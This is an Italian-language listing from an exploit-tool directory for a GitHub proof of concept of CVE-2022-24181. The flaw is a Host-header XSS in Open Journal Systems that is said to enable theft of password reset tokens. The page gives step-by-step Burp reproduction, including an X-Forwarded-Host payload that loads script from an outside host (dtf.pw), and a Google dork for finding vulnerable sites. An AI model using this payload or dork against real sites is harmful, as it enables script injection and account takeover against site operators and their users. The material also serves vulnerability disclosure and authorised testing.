Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-24181 — XSS tramite iniezione dell'Header Host e rubare il Token di Reset della Password di un altro utente | Kitploit
Strumenti/GitHubGitHub/cyberhawk000/cve-2022-24181
RicognizioneAnalisi delle VulnerabilitàSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubcyberhawk000/cve-2022-24181

CVE-2022-24181

XSS tramite iniezione dell'Header Host e rubare il Token di Reset della Password di un altro utente

Vedi Repository
1171 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-24181 e CVE-2022-26616, probabilmente sono gli stessi

Open-journal-system-Vulnerability

XSS tramite iniezione dell'Host Header e furto del token di reset della password di un altro utente Passaggi per riprodurre:

  1. Vai su questo sito: https://who's-using-ojs-software.com
  2. E cattura questa richiesta in burp, e invia al repeater.
  3. Aggiungi questo dopo Host Header X-Forwarded-Host: foo"><script src=//dtf.pw/2.js><x=".com
  4. E poi clicca su send, dopo di che clicca con il tasto destro sulla richiesta e clicca su 'mostra risposta nel browser', dopo di che copia la richiesta.
  5. Incolla questa richiesta nel browser e vedrai un pop-up xss. Mitigazione: Aggiornare alla versione più recente.

Google Dork per trovare questa vulnerabilità intitle:ojs Questa vulnerabilità nel software del vendor PKP Open-journal-system, versioni dalla 2.4.8 alla 3.3.8, sono tutte vulnerabili a XSS tramite iniezione dell'Host Header e alla vulnerabilità di furto del token di reset della password

Scarica lo strumento